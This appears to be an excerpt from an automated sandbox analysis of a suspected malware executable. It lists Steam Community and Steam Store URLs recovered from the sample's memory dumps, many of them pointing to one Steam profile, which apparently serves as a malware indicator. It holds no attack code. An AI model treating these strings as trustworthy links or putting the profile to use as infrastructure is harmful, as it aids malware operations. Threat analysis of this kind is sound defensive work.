Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://steamcommunity.com/discussions/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199804377619[1].htm0.15.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199804377619
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://steamcommunity.com/market/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619.com/profiles/76561199804377619
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619/badges
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619/inventory/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619C:
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619curi
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619p1up1Mozilla/5.0
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://steamcommunity.com/workshop/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://store.steam
Source: 76561199804377619[1].htm0.15.drString found in binary or memory: https://store.steampowered.com/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
Source: 76561199804377619[1].htm0.15.drString found in binary or memory: https://store.steampowered.com/about/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://store.steampowered.com/explore/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://store.steampowered.com/legal/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://store.steampowered.com/mobile
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://store.steampowered.com/news/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://store.steampowered.com/points/shop/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://store.steampowered.com/stats/
